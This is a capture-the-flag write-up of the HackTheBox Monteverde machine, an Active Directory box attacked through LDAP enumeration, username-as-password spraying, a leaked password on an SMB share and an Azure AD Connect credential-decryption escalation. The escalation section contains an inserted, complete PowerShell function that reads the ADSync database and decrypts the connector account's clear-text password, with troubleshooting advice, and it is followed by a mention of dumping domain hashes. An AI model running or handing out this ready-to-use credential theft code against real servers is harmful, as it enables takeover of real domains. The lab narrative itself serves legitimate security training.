HackTheBox — Monteverde

ARZ101
6 min readDec 11, 2021

Hello everyone, I hope you are doing well. In this post I will be sharing my writeup for HTB Monteverde, a medium-rated Windows Active Directory machine. SMB and LDAP were open on this box. We can extract usernames from LDAP with either windapsearch or enum4linux-ng; then, using those usernames as the password list, we can spray SMB with crackmapexec, which gives us access to the SMB shares. In one of the shares we find a plain-text password for the user mhope, who is in the Azure Admins group, and since Azure AD Connect is running on the box there is a known technique for recovering the clear-text password of the AD connector account, which here is Administrator.

NMAP

PORT      STATE SERVICE       VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-11 11:29:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
59490/tcp open msrpc Microsoft Windows RPC
Host script results:
|_clock-skew: -1s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-12-11T11:32:09
|_ start_date: N/A

From the nmap scan we can see port 88 (Kerberos) open alongside DNS (53), LDAP (389/636) and the Global Catalog (3268/3269), so this machine is an Active Directory domain controller for MEGABANK.LOCAL. WinRM (5985) is open too, which will matter once we have credentials.

PORT 139/445 (SMB)

We can first check whether SMB allows an unauthenticated (null session) login and lists any shares.

We were able to log in, but no shares were listed, so moving on. We can use enum4linux or windapsearch to enumerate users through LDAP queries. The nmap scan gave us the domain name, MEGABANK.LOCAL, so add it to /etc/hosts.

windapsearch lists the service accounts and domain users; let's also try it with enum4linux-ng.

This tool gives us better results, so I'll go with it and save the usernames to a text file.

Next I checked which users have Kerberos pre-authentication disabled (AS-REP roasting) with impacket's GetNPUsers.py, which would hand us a crackable AS-REP hash for any such account:

python3 GetNPUsers.py -dc-ip 10.10.10.172 MEGABANK.local/arz -usersfile ~/Notes/CTFs/HTB/Medium/Monteverde/users.txt

But we didn't have any luck with AS-REP roasting, as none of the users had pre-authentication disabled. Next we can try some common passwords against SMB with crackmapexec, so I created a list of common passwords:

12345678
admin
dgalanos
roleary
smorgan
password
password123
Password
Password123
1234567

But it didn't work, so I tried using the usernames file as the password list as well (crackmapexec's --no-bruteforce option pairs the two lists line by line, so each user is only tried with their own name as the password).

This found a user whose password is the same as their username, valid for SMB. I tried the same credentials on WinRM to see if I could get a shell, but sadly they weren't valid for WinRM (the account is not allowed to log in remotely).

We have read access to the azure_uploads share, but it was empty.

Foothold

Checking the users$ share, we see an azure.xml file in mhope's directory.

Reading the XML gives us a clear-text password.

So let's run crackmapexec again to check that this password is correct for mhope.

The password is also valid for WinRM, so we can use evil-winrm to log in. After logging in, whoami /groups shows that this user is in the Azure Admins group.

Upload SharpHound.ps1, BloodHound's collector, which gathers the AD data that we can then explore in BloodHound:

Invoke-Bloodhound -CollectionMethod All -Domain MEGABANK.local -ZipFileName loot.zip

We can download this archive with evil-winrm's download function, which needs the absolute path of the file.

Now launch the neo4j console and BloodHound, and import the JSON files you get after extracting the archive.

Run any of the built-in queries to confirm the data actually loaded.

But here I didn't find anything that would help me escalate privileges.

Privilege Escalation

Now remember that mhope is in the Azure Admins group, so maybe we have to abuse that. Searching for Azure AD related attacks I found an article on Azure AD Connect: the sync service keeps the credentials of the on-premises AD connector account encrypted in its local ADSync database, and the key material needed to decrypt them lives on the same machine, so anyone who can read that database can recover the connector account's clear-text password.

Download the executable for this technique from the releases page:

https://github.com/VbScrub/AdSyncDecrypt/releases

Now upload the exe and the dll file. The tool depends on the Azure AD Sync libraries, so we need to change directory to C:\Program Files\Microsoft Azure AD Sync\Bin and execute the exe from there (it doesn't matter where we uploaded it).

This gives us the Administrator's password, since on this box Administrator is the account configured as the AD connector.
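As an added example (this is not the page's tool and not vbscrub's code), here is the same recovery done directly in PowerShell from the evil-winrm shell, following the approach the referenced article describes and the widely circulated proof of concept by Adam Chester (@_xpn_). It assumes the ADSync database is on a local SQL Server instance reachable with Windows authentication (the connection string is an assumption; LocalDB installs use a different one) and that mcrypt.dll is at the path given above.

```powershell
# Added example: extract the AD DS connector account credential from an
# Azure AD Connect (ADSync) database. Not the page's tool. Run it on the sync
# server as a user who can read the ADSync database (here, an Azure Admins member).
function Get-ADSyncConnectorCredential {
    param(
        # ASSUMPTION: the box hosts ADSync on a full SQL Server instance on
        # localhost. A LocalDB install would instead use
        # "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync".
        [string]$ConnectionString = "Server=localhost;Database=ADSync;Trusted_Connection=True",
        # Path given in the page; mcrypt.dll carries the KeyManager class.
        [string]$McryptPath = "C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll"
    )

    $client = New-Object System.Data.SqlClient.SqlConnection -ArgumentList $ConnectionString
    $client.Open()
    try {
        # 1. Identifiers of the DPAPI-protected keyset used to encrypt credentials.
        $cmd = $client.CreateCommand()
        $cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
        $reader = $cmd.ExecuteReader()
        if (-not $reader.Read()) { throw "mms_server_configuration is empty" }
        $keyId      = $reader.GetInt32(0)
        $instanceId = $reader.GetGuid(1)
        $entropy    = $reader.GetGuid(2)
        $reader.Close()

        # 2. The AD connector: clear-text config XML (domain, username) plus the
        #    encrypted blob that holds the password.
        $cmd = $client.CreateCommand()
        $cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
        $reader = $cmd.ExecuteReader()
        if (-not $reader.Read()) { throw "no AD management agent found in mms_management_agent" }
        $config  = $reader.GetString(0)
        $crypted = $reader.GetString(1)
        $reader.Close()
    }
    finally {
        $client.Close()
    }

    # 3. Let Microsoft's own library load the keyset and decrypt the blob.
    Add-Type -Path $McryptPath
    $km = New-Object Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
    $km.LoadKeySet($entropy, $instanceId, $keyId)
    $activeKey = $null
    $km.GetActiveCredentialKey([ref]$activeKey)   # called first, as in the published PoC
    $key = $null
    $km.GetKey(1, [ref]$key)
    $decrypted = $null
    $key.DecryptBase64ToString($crypted, [ref]$decrypted)

    # 4. Pull the fields out of the two XML documents.
    $domain   = (Select-Xml -Content $config    -XPath "//parameter[@name='forest-login-domain']").Node.InnerXml
    $username = (Select-Xml -Content $config    -XPath "//parameter[@name='forest-login-user']").Node.InnerXml
    $password = (Select-Xml -Content $decrypted -XPath "//attribute").Node.InnerXml

    [pscustomobject]@{ Domain = $domain; Username = $username; Password = $password }
}

Get-ADSyncConnectorCredential
```

If the connection fails, check which SQL instance ADSync actually uses (the service's connection settings, or a LocalDB instance) and pass the matching string as -ConnectionString; the decryption steps are the same either way.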

With the Administrator credentials we can then go further and dump all user hashes from the domain controller, for example with impacket's secretsdump.py.

References

https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/
